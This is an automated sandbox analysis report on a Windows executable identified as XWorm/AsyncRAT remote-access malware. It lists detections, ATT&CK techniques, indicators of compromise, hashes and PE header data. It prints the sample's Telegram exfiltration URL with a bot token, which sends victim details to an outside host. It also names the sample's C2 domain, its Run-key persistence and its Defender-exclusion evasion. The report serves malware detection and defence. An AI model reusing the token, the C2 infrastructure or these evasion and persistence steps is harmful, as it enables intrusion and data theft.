Source: Yara match | File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic column; digits preceding a technique are the signature-count badges shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 11 Windows Management Instrumentation | 1 PowerShell | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 11 Process Injection | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 1 Masquerading | 11 Disable or Modify Tools | 131 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 11 Obfuscated Files or Information | 2 Software Packing | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 221 Security Software Discovery | 1 Process Discovery | 131 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 File and Directory Discovery | 13 System Information Discovery | Remote System Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 11 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 1 Web Service | 11 Encrypted Channel | 1 Non-Standard Port | 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 13 Application Layer Protocol | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Behavior Graph (rendered figure; text recovered from the graph)
Behavior Graph ID: 1545317 | Sample: 9RgE5uOJwX.exe | Startdate: 30/10/2024 | Architecture: WINDOWS | Score: 100
DNS/IP: api.telegram.org 149.154.167.220, 443, 49399 TELEGRAMRU United Kingdom | vehicle-temp.gl.at.ply.gg 147.185.221.23, 1930, 49406, 49407 SALSGIVERUS United States
Dropped file: C:\Users\user\AppData\...\MicrosoftClient.exe, PE32 (dropped by 9RgE5uOJwX.exe)
Signatures on the graph: Suricata IDS alerts for network traffic | Found malware configuration | Malicious sample detected (through community Yara rule) | 10 other signatures | Uses the Telegram API (likely for C&C communication) (api.telegram.org) | Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) | Protects its processes via BreakOnTermination flag | Bypasses PowerShell execution policy | Adds a directory exclusion to Windows Defender (9RgE5uOJwX.exe) | Multi AV Scanner detection for dropped file | Machine Learning detection for dropped file (MicrosoftClient.exe) | Loading BitLocker PowerShell Module (powershell.exe)
Process tree: 9RgE5uOJwX.exe started; it started four powershell.exe instances, each of which started a conhost.exe; MicrosoftClient.exe started (two instances)

Source | Detection | Scanner | Label
9RgE5uOJwX.exe | 81% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
9RgE5uOJwX.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\MicrosoftClient.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\MicrosoftClient.exe | 81% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://crl.mic | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
vehicle-temp.gl.at.ply.gg | 147.185.221.23 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
vehicle-temp.gl.at.ply.gg | true | | unknown
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.coiops | powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | 9RgE5uOJwX.exe, MicrosoftClient.exe.0.dr | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft | powershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micft.cMicRosof | powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470 | 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
147.185.221.23 | vehicle-temp.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545317
Start date and time: 2024-10-30 12:21:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9RgE5uOJwX.exe (renamed because the original name is a hash value)
Original Sample Name: 72f5f19b35b22d82d8459f5e0739c248.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@15/19@2/2
EGA Information:
• Successful, ratio: 14.3%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 55
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MicrosoftClient.exe, PID 4048 because it is empty
• Execution Graph export aborted for target MicrosoftClient.exe, PID 5580 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4856 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5168 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5268 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: 9RgE5uOJwX.exe
Time      Type             Description
07:22:01  API Interceptor  54x Sleep call for process: powershell.exe modified
07:22:52  API Interceptor  399950x Sleep call for process: 9RgE5uOJwX.exe modified
12:22:55  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftClient C:\Users\user\AppData\Local\MicrosoftClient.exe
12:23:03  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftClient C:\Users\user\AppData\Local\MicrosoftClient.exe
Match            Associated Sample Name / URL              Detection  Threat Name
149.154.167.220  app64.exe                                 malicious  Unknown
                 na.doc                                    malicious  Snake Keylogger, VIP Keylogger
                 na.doc                                    malicious  Snake Keylogger, VIP Keylogger
                 na.doc                                    malicious  Snake Keylogger, VIP Keylogger
                 na.doc                                    malicious  Snake Keylogger, VIP Keylogger
                 file.exe                                  malicious  WhiteSnake Stealer
                 ADJUNTA.vbs                               malicious  GuLoader, Snake Keylogger
                 Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger
                 Request For Quotation-RFQ097524_Pdf.vbs   malicious  GuLoader, Snake Keylogger
                 Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger
147.185.221.23   rustdesk.exe                              malicious  XWorm
                 q0SpP6HxtE.exe                            malicious  XWorm
                 mkDhqaw9dx.exe                            malicious  XWorm
                 R7iHtCsOYz.exe                            malicious  XWorm
                 Zvas34nq1T.exe                            malicious  XWorm
                 fMdcaIZWzT.exe                            malicious  XWorm
                 vtuLkV5KEW.exe                            malicious  XWorm
                 IGznKtHyTp.exe                            malicious  XWorm
                 6PJia32WYA.exe                            malicious  Njrat
                 lx3vLwrX57.exe                            malicious  XWorm
Match             Associated Sample Name / URL              Detection  Threat Name                     Context
api.telegram.org  app64.exe                                 malicious  Unknown                         149.154.167.220
                  na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
                  na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
                  na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
                  na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
                  file.exe                                  malicious  WhiteSnake Stealer              149.154.167.220
                  ADJUNTA.vbs                               malicious  GuLoader, Snake Keylogger       149.154.167.220
                  Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger       149.154.167.220
                  Request For Quotation-RFQ097524_Pdf.vbs   malicious  GuLoader, Snake Keylogger       149.154.167.220
                  Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger       149.154.167.220
Match        Associated Sample Name / URL              Detection  Threat Name                     Context
TELEGRAMRU   app64.exe                                 malicious  Unknown                         149.154.167.220
             na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
             na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
             na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
             na.doc                                    malicious  Snake Keylogger, VIP Keylogger  149.154.167.220
             file.exe                                  malicious  WhiteSnake Stealer              149.154.167.220
             ADJUNTA.vbs                               malicious  GuLoader, Snake Keylogger       149.154.167.220
             Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger       149.154.167.220
             Request For Quotation-RFQ097524_Pdf.vbs   malicious  GuLoader, Snake Keylogger       149.154.167.220
             Request For Quotation-RFQ097524.vbs       malicious  GuLoader, Snake Keylogger       149.154.167.220
SALSGIVERUS  la.bot.arm.elf                            malicious  Unknown                         147.176.169.71
             rustdesk.exe                              malicious  XWorm                           147.185.221.23
             Nurcraft.exe                              malicious  XWorm                           147.185.221.21
             q0SpP6HxtE.exe                            malicious  XWorm                           147.185.221.23
             7bZWBYVNPU.exe                            malicious  XWorm                           147.185.221.22
             mkDhqaw9dx.exe                            malicious  XWorm                           147.185.221.23
             R7iHtCsOYz.exe                            malicious  XWorm                           147.185.221.23
             Zvas34nq1T.exe                            malicious  XWorm                           147.185.221.23
             fMdcaIZWzT.exe                            malicious  XWorm                           147.185.221.23
             vtuLkV5KEW.exe                            malicious  XWorm                           147.185.221.23
Match                             Associated Sample Name / URL                      Detection  Threat Name                              Context
3b5074b1b5d032e5620f69f9f700ff0e  Biocon-In-Service Agreement.pdf                   malicious  EvilProxy, HTMLPhisher                   149.154.167.220
                                  file.exe                                          malicious  Stealc, Vidar                            149.154.167.220
                                  app64.exe                                         malicious  Unknown                                  149.154.167.220
                                  INQ-40152.scr                                     malicious  Unknown                                  149.154.167.220
                                  Shipping documents 00039984849900044800.exe       malicious  AgentTesla, GuLoader                     149.154.167.220
                                  z1Transaction_ID_REF2418_cmd.bat                  malicious  AgentTesla, DBatLoader, PureLog Stealer  149.154.167.220
                                  greatthingswithmegood.hta                         malicious  Cobalt Strike, HTMLPhisher               149.154.167.220
                                  file.exe                                          malicious  WhiteSnake Stealer                       149.154.167.220
                                  Reff_Yazaki-europe_575810710108_ZnjKTIejsM.html   malicious  Unknown                                  149.154.167.220
                                  ADJUNTA.vbs                                       malicious  GuLoader, Snake Keylogger                149.154.167.220
No context
Process: C:\Users\user\Desktop\9RgE5uOJwX.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 166912
Entropy (8bit): 4.615880115115375
Encrypted: false
SSDEEP: 1536:9QJaAtooQh0elU0qT9rbRCKGOjEkb2yMnx8Xb627dOnZzWEU:eJaNp9lVYoKGNkb2ymxMhOnZSEU
MD5: 72F5F19B35B22D82D8459F5E0739C248
SHA1: 0218DD2B354DCFDFF2A11D06B6CF57F53987E9EB
SHA-256: 4571751B2B7477FDED0012F46ADED7C86FB93194980897418C17AC917C4D4CC1
SHA-512: AE5FB16700E76A79049B9B92F13EAD1D611B490A1E447ADCC1A6DA35BE611E2C1E2FC618D17CC4F3A2052FD9B4CF261E12C1464474590C30647A40580E9E2D07
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: ditekSHen
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 81%
Reputation: low
                                                                                          Process:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):654
                                                                                          Entropy (8bit):5.380476433908377
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):4.615880115115375
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:9RgE5uOJwX.exe
                                                                                          File size:166'912 bytes
                                                                                          MD5:72f5f19b35b22d82d8459f5e0739c248
                                                                                          SHA1:0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
                                                                                          SHA256:4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
                                                                                          SHA512:ae5fb16700e76a79049b9b92f13ead1d611b490a1e447adcc1a6da35be611e2c1e2fc618d17cc4f3a2052fd9b4cf261e12c1464474590c30647a40580e9e2d07
                                                                                          SSDEEP:1536:9QJaAtooQh0elU0qT9rbRCKGOjEkb2yMnx8Xb627dOnZzWEU:eJaNp9lVYoKGNkb2ymxMhOnZSEU
                                                                                          TLSH:9CF38CCB6E5042B7D3ADFA7048B3733D432BA97E6BC34E0EA49B3E4A573254C8841195
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..g................................. ... ....@.. ....................................@................................
                                                                                          Icon Hash:8e172d4461e84423
                                                                                          Entrypoint:0x410fbe
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67100D4E [Wed Oct 16 19:00:30 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10f70 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0x1970e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
